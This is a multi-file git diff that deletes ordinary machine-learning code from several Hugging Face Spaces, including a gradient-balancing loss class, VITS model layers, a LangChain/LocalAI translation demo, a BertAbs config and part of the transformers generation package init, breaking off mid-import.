gradient - going into `f(...)` will come from `l1` on average, and 33% from `l2`. This allows for an easy - interpration of the weights even if the intrisic scale of `l1`, `l2` ... is unknown. - - Noting `g1 = d l1 / dy`, etc., the balanced gradient `G` will be - (with `avg` an exponential moving average over the updates), - - G = sum_i total_norm * g_i / avg(||g_i||) * w_i / sum(w_i) - - If `balance_grads` is False, this is deactivated, and instead the gradient will just be the - standard sum of the partial gradients with the given weights. - - A call to the backward method of the balancer will compute the the partial gradients, - combining all the losses and potentially rescaling the gradients, - which can help stabilize the training and reason about multiple losses with varying scales. - The obtained gradient with respect to `y` is then back-propagated to `f(...)`. - - Expected usage: - - weights = {'loss_a': 1, 'loss_b': 4} - balancer = Balancer(weights, ...) - losses: dict = {} - losses['loss_a'] = compute_loss_a(x, y) - losses['loss_b'] = compute_loss_b(x, y) - if model.training(): - effective_loss = balancer.backward(losses, x) - - Args: - weights (dict[str, float]): Weight coefficient for each loss. The balancer expect the losses keys - from the backward method to match the weights keys to assign weight to each of the provided loss. - balance_grads (bool): Whether to rescale gradients so that weights reflect the fraction of the - overall gradient, rather than a constant multiplier. - total_norm (float): Reference norm when rescaling gradients, ignored otherwise. - emay_decay (float): EMA decay for averaging the norms. - per_batch_item (bool): Whether to compute the averaged norm per batch item or not. This only holds - when rescaling the gradients. - epsilon (float): Epsilon value for numerical stability. - monitor (bool): If True, stores in `self.metrics` the relative ratio between the norm of the gradients - coming from each loss, when calling `backward()`. - """ - def __init__(self, weights: tp.Dict[str, float], balance_grads: bool = True, total_norm: float = 1., - ema_decay: float = 0.999, per_batch_item: bool = True, epsilon: float = 1e-12, - monitor: bool = False): - self.weights = weights - self.per_batch_item = per_batch_item - self.total_norm = total_norm or 1. - self.averager = flashy.averager(ema_decay or 1.) - self.epsilon = epsilon - self.monitor = monitor - self.balance_grads = balance_grads - self._metrics: tp.Dict[str, tp.Any] = {} - - @property - def metrics(self): - return self._metrics - - def backward(self, losses: tp.Dict[str, torch.Tensor], input: torch.Tensor) -> torch.Tensor: - """Compute the backward and return the effective train loss, e.g. the loss obtained from - computing the effective weights. If `balance_grads` is True, the effective weights - are the one that needs to be applied to each gradient to respect the desired relative - scale of gradients coming from each loss. - - Args: - losses (Dict[str, torch.Tensor]): dictionary with the same keys as `self.weights`. - input (torch.Tensor): the input of the losses, typically the output of the model. - This should be the single point of dependence between the losses - and the model being trained. - """ - norms = {} - grads = {} - for name, loss in losses.items(): - # Compute partial derivative of the less with respect to the input. - grad, = autograd.grad(loss, [input], retain_graph=True) - if self.per_batch_item: - # We do not average the gradient over the batch dimension. - dims = tuple(range(1, grad.dim())) - norm = grad.norm(dim=dims, p=2).mean() - else: - norm = grad.norm(p=2) - norms[name] = norm - grads[name] = grad - - count = 1 - if self.per_batch_item: - count = len(grad) - # Average norms across workers. Theoretically we should average the - # squared norm, then take the sqrt, but it worked fine like that. - avg_norms = flashy.distrib.average_metrics(self.averager(norms), count) - # We approximate the total norm of the gradient as the sums of the norms. - # Obviously this can be very incorrect if all gradients are aligned, but it works fine. - total = sum(avg_norms.values()) - - self._metrics = {} - if self.monitor: - # Store the ratio of the total gradient represented by each loss. - for k, v in avg_norms.items(): - self._metrics[f'ratio_{k}'] = v / total - - total_weights = sum([self.weights[k] for k in avg_norms]) - assert total_weights > 0. - desired_ratios = {k: w / total_weights for k, w in self.weights.items()} - - out_grad = torch.zeros_like(input) - effective_loss = torch.tensor(0., device=input.device, dtype=input.dtype) - for name, avg_norm in avg_norms.items(): - if self.balance_grads: - # g_balanced = g / avg(||g||) * total_norm * desired_ratio - scale = desired_ratios[name] * self.total_norm / (self.epsilon + avg_norm) - else: - # We just do regular weighted sum of the gradients. - scale = self.weights[name] - out_grad.add_(grads[name], alpha=scale) - effective_loss += scale * losses[name].detach() - # Send the computed partial derivative with respect to the output of the model to the model. - input.backward(out_grad) - return effective_loss diff --git a/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md b/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md deleted file mode 100644 index 03bf7e5b5be4e09e2ca7eda5f0ff95d12d0ffa13..0000000000000000000000000000000000000000 --- a/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Comparison Of Manifold Learning Methods -emoji: 🤗 -colorFrom: gray -colorTo: red -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/cc1799/vits-uma-genshin-honkai/modules.py b/spaces/cc1799/vits-uma-genshin-honkai/modules.py deleted file mode 100644 index 56ea4145eddf19dd330a3a41ab0183efc1686d83..0000000000000000000000000000000000000000 --- a/spaces/cc1799/vits-uma-genshin-honkai/modules.py +++ /dev/null @@ -1,388 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from transforms import piecewise_rational_quadratic_transform - - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential( - nn.ReLU(), - nn.Dropout(p_dropout)) - for _ in range(n_layers-1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size ** i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size, - groups=channels, dilation=dilation, padding=padding - )) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert(kernel_size % 2 == 1) - self.hidden_channels =hidden_channels - self.kernel_size = kernel_size, - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight') - - for i in range(n_layers): - dilation = dilation_rate ** i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size, - dilation=dilation, padding=padding) - in_layer = torch.nn.utils.weight_norm(in_layer, name='weight') - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight') - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply( - x_in, - g_l, - n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:,:self.hidden_channels,:] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:,self.hidden_channels:,:] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels,1)) - self.logs = nn.Parameter(torch.zeros(channels,1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1,2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN(hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels]*2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1,2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - -class ConvFlow(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, n_layers, num_bins=10, tail_bound=5.0): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.) - self.proj = nn.Conv1d(filter_channels, self.half_channels * (num_bins * 3 - 1), 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] - - unnormalized_widths = h[..., :self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins:2*self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_derivatives = h[..., 2 * self.num_bins:] - - x1, logabsdet = piecewise_rational_quadratic_transform(x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails='linear', - tail_bound=self.tail_bound - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1,2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py b/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py deleted file mode 100644 index 52271b673c3df896f653c0ef83c62f0c50767375..0000000000000000000000000000000000000000 --- a/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py +++ /dev/null @@ -1,46 +0,0 @@ -import os -import logging - -from langchain.chat_models import ChatOpenAI -from langchain import PromptTemplate, LLMChain -from langchain.prompts.chat import ( - ChatPromptTemplate, - SystemMessagePromptTemplate, - AIMessagePromptTemplate, - HumanMessagePromptTemplate, -) -from langchain.schema import ( - AIMessage, - HumanMessage, - SystemMessage -) - -# This logging incantation makes it easy to see that you're actually reaching your LocalAI instance rather than OpenAI. -logging.basicConfig(level=logging.DEBUG) - -print('Langchain + LocalAI PYTHON Tests') - -base_path = os.environ.get('OPENAI_API_BASE', 'http://api:8080/v1') -key = os.environ.get('OPENAI_API_KEY', '-') -model_name = os.environ.get('MODEL_NAME', 'gpt-3.5-turbo') - - -chat = ChatOpenAI(temperature=0, openai_api_base=base_path, openai_api_key=key, model_name=model_name, max_tokens=100) - -print("Created ChatOpenAI for ", chat.model_name) - -template = "You are a helpful assistant that translates {input_language} to {output_language}. The next message will be a sentence in {input_language}. Respond ONLY with the translation in {output_language}. Do not respond in {input_language}!" -system_message_prompt = SystemMessagePromptTemplate.from_template(template) -human_template = "{text}" -human_message_prompt = HumanMessagePromptTemplate.from_template(human_template) - -chat_prompt = ChatPromptTemplate.from_messages([system_message_prompt, human_message_prompt]) - -print("ABOUT to execute") - -# get a chat completion from the formatted messages -response = chat(chat_prompt.format_prompt(input_language="English", output_language="French", text="I love programming.").to_messages()) - -print(response) - -print("."); \ No newline at end of file diff --git a/spaces/chendl/compositional_test/multimodal/playground.py b/spaces/chendl/compositional_test/multimodal/playground.py deleted file mode 100644 index 5601eda90d9759f56b6cefdb7b91129634b6cad4..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/multimodal/playground.py +++ /dev/null @@ -1,11 +0,0 @@ -import os -import json - -if __name__ == "__main__": - blip2_cases = os.listdir("/gpfs/u/home/LMCG/LMCGljnn/scratch/code/multimodal2/blip2_baseline/blip2_fail_case") - kmos2_cases = os.listdir("/gpfs/u/home/LMCG/LMCGljnn/scratch/code/unilm/kosmos-2/kmos2_fail_case") - blip2_failed_ids = set([int(c.split("_")[0]) for c in blip2_cases]) - kmos2_failed_ids = set([int(c.split("_")[0]) for c in kmos2_cases]) - both_failed_ids = list(blip2_failed_ids.intersection(kmos2_failed_ids)) - print(both_failed_ids) - json.dump(both_failed_ids, open("both_failed_ids.json", "w"), indent=1) diff --git a/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py b/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py deleted file mode 100644 index 02b8f27cb30a2a7f9c203dc8084db087086b1e21..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py +++ /dev/null @@ -1,97 +0,0 @@ -# coding=utf-8 -# Copyright 2019 The HuggingFace Inc. team. -# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" BertAbs configuration """ -import logging - -from transformers import PretrainedConfig - - -logger = logging.getLogger(__name__) - - -BERTABS_FINETUNED_CONFIG_MAP = { - "bertabs-finetuned-cnndm": "https://huggingface.co/remi/bertabs-finetuned-cnndm-extractive-abstractive-summarization/resolve/main/config.json", -} - - -class BertAbsConfig(PretrainedConfig): - r"""Class to store the configuration of the BertAbs model. - - Arguments: - vocab_size: int - Number of tokens in the vocabulary. - max_pos: int - The maximum sequence length that this model will be used with. - enc_layer: int - The numner of hidden layers in the Transformer encoder. - enc_hidden_size: int - The size of the encoder's layers. - enc_heads: int - The number of attention heads for each attention layer in the encoder. - enc_ff_size: int - The size of the encoder's feed-forward layers. - enc_dropout: int - The dropout probability for all fully connected layers in the - embeddings, layers, pooler and also the attention probabilities in - the encoder. - dec_layer: int - The numner of hidden layers in the decoder. - dec_hidden_size: int - The size of the decoder's layers. - dec_heads: int - The number of attention heads for each attention layer in the decoder. - dec_ff_size: int - The size of the decoder's feed-forward layers. - dec_dropout: int - The dropout probability for all fully connected layers in the - embeddings, layers, pooler and also the attention probabilities in - the decoder. - """ - - model_type = "bertabs" - - def __init__( - self, - vocab_size=30522, - max_pos=512, - enc_layers=6, - enc_hidden_size=512, - enc_heads=8, - enc_ff_size=512, - enc_dropout=0.2, - dec_layers=6, - dec_hidden_size=768, - dec_heads=8, - dec_ff_size=2048, - dec_dropout=0.2, - **kwargs, - ): - super().__init__(**kwargs) - - self.vocab_size = vocab_size - self.max_pos = max_pos - - self.enc_layers = enc_layers - self.enc_hidden_size = enc_hidden_size - self.enc_heads = enc_heads - self.enc_ff_size = enc_ff_size - self.enc_dropout = enc_dropout - - self.dec_layers = dec_layers - self.dec_hidden_size = dec_hidden_size - self.dec_heads = dec_heads - self.dec_ff_size = dec_ff_size - self.dec_dropout = dec_dropout diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py b/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py deleted file mode 100644 index bf87b6e5ff5fe21b91419c646cf4a3d7f69059bc..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright 2022 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from typing import TYPE_CHECKING - -from ..utils import OptionalDependencyNotAvailable, _LazyModule, is_flax_available, is_tf_available, is_torch_available - - -_import_structure = { - "configuration_utils": ["GenerationConfig"], - "streamers": ["TextIteratorStreamer", "TextStreamer"], -} - -try: - if not is_torch_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["beam_constraints"] = [ - "Constraint", - "ConstraintListState", - "DisjunctiveConstraint", - "PhrasalConstraint", - ] - _import_structure["beam_search"] = [ - "BeamHypotheses", - "BeamScorer", - "BeamSearchScorer", - "ConstrainedBeamSearchScorer", - ] - _import_structure["logits_process"] = [ - "EpsilonLogitsWarper", - "EtaLogitsWarper", - "ForcedBOSTokenLogitsProcessor", - "ForcedEOSTokenLogitsProcessor", - "HammingDiversityLogitsProcessor", - "InfNanRemoveLogitsProcessor", - "LogitsProcessor", - "LogitsProcessorList", - "LogitsWarper", - "MinLengthLogitsProcessor", - "MinNewTokensLengthLogitsProcessor", - "NoBadWordsLogitsProcessor", - "NoRepeatNGramLogitsProcessor", - "PrefixConstrainedLogitsProcessor", - "RepetitionPenaltyLogitsProcessor", - "EncoderRepetitionPenaltyLogitsProcessor", - "TemperatureLogitsWarper", - "TopKLogitsWarper", - "TopPLogitsWarper", - "TypicalLogitsWarper", - "EncoderNoRepeatNGramLogitsProcessor", - "ExponentialDecayLengthPenalty", - "LogitNormalization", - ] - _import_structure["stopping_criteria"] = [ - "MaxNewTokensCriteria", - "MaxLengthCriteria", - "MaxTimeCriteria", - "StoppingCriteria", - "StoppingCriteriaList", - "validate_stopping_criteria", - ] - _import_structure["utils"] = [ - "GenerationMixin", - "top_k_top_p_filtering", - "GreedySearchEncoderDecoderOutput", - "GreedySearchDecoderOnlyOutput", - "SampleEncoderDecoderOutput", - "SampleDecoderOnlyOutput", - "BeamSearchEncoderDecoderOutput", - "BeamSearchDecoderOnlyOutput", - "BeamSampleEncoderDecoderOutput", - "BeamSampleDecoderOnlyOutput", - "ContrastiveSearchEncoderDecoderOutput", - "ContrastiveSearchDecoderOnlyOutput", - ] - -try: - if not is_tf_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["tf_logits_process"] = [ - "TFForcedBOSTokenLogitsProcessor", - "TFForcedEOSTokenLogitsProcessor", - "TFLogitsProcessor", - "TFLogitsProcessorList", - "TFLogitsWarper", - "TFMinLengthLogitsProcessor", - "TFNoBadWordsLogitsProcessor", - "TFNoRepeatNGramLogitsProcessor", - "TFRepetitionPenaltyLogitsProcessor", - "TFTemperatureLogitsWarper", - "TFTopKLogitsWarper", - "TFTopPLogitsWarper", - "TFForceTokensLogitsProcessor", - "TFSuppressTokensAtBeginLogitsProcessor", - "TFSuppressTokensLogitsProcessor", - ] - _import_structure["tf_utils"] = [ - "TFGenerationMixin", - "tf_top_k_top_p_filtering", - "TFGreedySearchDecoderOnlyOutput", - "TFGreedySearchEncoderDecoderOutput", - "TFSampleEncoderDecoderOutput", - "TFSampleDecoderOnlyOutput", - "TFBeamSearchEncoderDecoderOutput", - "TFBeamSearchDecoderOnlyOutput", - "TFBeamSampleEncoderDecoderOutput", - "TFBeamSampleDecoderOnlyOutput", - "TFContrastiveSearchEncoderDecoderOutput", - "TFContrastiveSearchDecoderOnlyOutput", - ] - -try: - if not is_flax_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["flax_logits_process"] = [ - "FlaxForcedBOSTokenLogitsProcessor", - "FlaxForcedEOSTokenLogitsProcessor", - "FlaxLogitsProcessor", - "FlaxLogitsProcessorList", - "FlaxLogitsWarper", - "FlaxMinLengthLogitsProcessor", - "FlaxTemperatureLogitsWarper", - "FlaxTopKLogitsWarper", - "FlaxTopPLogitsWarper", - ] - _import_structure["flax_utils"] = [ - "FlaxGenerationMixin", - "FlaxGreedySearchOutput", - "FlaxSampleOutput", - "FlaxBeamSearchOutput", - ] - -if TYPE_CHECKING: - from .configuration_utils import GenerationConfig - from .streamers import TextIteratorStreamer, TextStreamer - - try: - if not is_torch_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .beam_constraints import Constraint, ConstraintListState, DisjunctiveConstraint, PhrasalConstraint - from .beam_search import BeamHypotheses, BeamScorer, BeamSearchScorer, ConstrainedBeamSearchScorer - from .logits_process import ( - EncoderNoRepeatNGramLogitsProcessor, - EncoderRepetitionPenaltyLogitsProcessor, - EpsilonLogitsWarper, - EtaLogitsWarper, - ExponentialDecayLengthPenalty, - ForcedBOSTokenLogitsProcessor, - ForcedEOSTokenLogitsProcessor, - HammingDiversityLogitsProcessor, - InfNanRemoveLogitsProcessor, - LogitNormalization, - LogitsProcessor, - LogitsProcessorList, - LogitsWarper, - MinLengthLogitsProcessor, - MinNewTokensLengthLogitsProcessor, - NoBadWordsLogitsProcessor, - NoRepeatNGramLogitsProcessor, - PrefixConstrainedLogitsProcessor, - RepetitionPenaltyLogitsProcessor, - TemperatureLogitsWarper, - TopKLogitsWarper, - TopPLogitsWarper, - TypicalLogitsWarper, - ) - from .stopping_criteria import ( - MaxLengthCriteria, - MaxNewTokensCriteria, - MaxTimeCriteria, - StoppingCriteria, - StoppingCriteriaList, - validate_stopping_criteria, - ) - from .utils import ( - BeamSampleDecoderOnlyOutput, - BeamSampleEncoderDecoderOutput, - BeamSearchDecoderOnlyOutput, - BeamSearchEncoderDecoderOutput, - ContrastiveSearchDecoderOnlyOutput, - ContrastiveSearchEncoderDecoderOutput, - GenerationMixin, - GreedySearchDecoderOnlyOutput, - GreedySearchEncoderDecoderOutput, - SampleDecoderOnlyOutput, - SampleEncoderDecoderOutput, - top_k_top_p_filtering, - ) - - try: - if not is_tf_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .tf_logits_process import ( - TFForcedBOSTokenLogitsProcessor, - TFForcedEOSTokenLogitsProcessor, - TFForceTokensLogitsProcessor, - TFLogitsProcessor, - TFLogitsProcessorList, - TFLogitsWarper, - TFMinLengthLogitsProcessor, - TFNoBadWordsLogitsProcessor, - TFNoRepeatNGramLogitsProcessor, - TFRepetitionPenaltyLogitsProcessor, - TFSuppressTokensAtBeginLogitsProcessor, - TFSuppressTokensLogitsProcessor, - TFTemperatureLogitsWarper, - TFTopKLogitsWarper, - TFTopPLogitsWarper, - ) - from .tf_utils import ( - TFBeamSampleDecoderOnlyOutput, - TFBeamSampleEncoderDecoderOutput, - TFBeamSearchDecoderOnlyOutput, - TFBeamSearchEncoderDecoderOutput, - TFContrastiveSearchDecoderOnlyOutput, - TFContrastiveSearchEncoderDecoderOutput, - TFGenerationMixin, - TFGreedySearchDecoderOnlyOutput, - TFGreedySearchEncoderDecoderOutput, - TFSampleDecoderOnlyOutput, - TFSampleEncoderDecoderOutput, - tf_top_k_top_p_filtering, - ) - - try: - if not is_flax_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .flax_logits_process import ( - FlaxForcedBOSTokenLogitsProcessor, - FlaxForcedEOSTokenLogitsProcessor, - FlaxLogitsProcessor, - FlaxLogitsProcessorList, - FlaxLogitsWarper, - FlaxMinLengthLogitsProcessor, - FlaxTemperatureLogitsWarper, - FlaxTopKLogitsWarper, - FlaxTopPLogitsWarper, - ) - from .flax_utils import FlaxBeamSearchOutput, FlaxGenerationMixin, 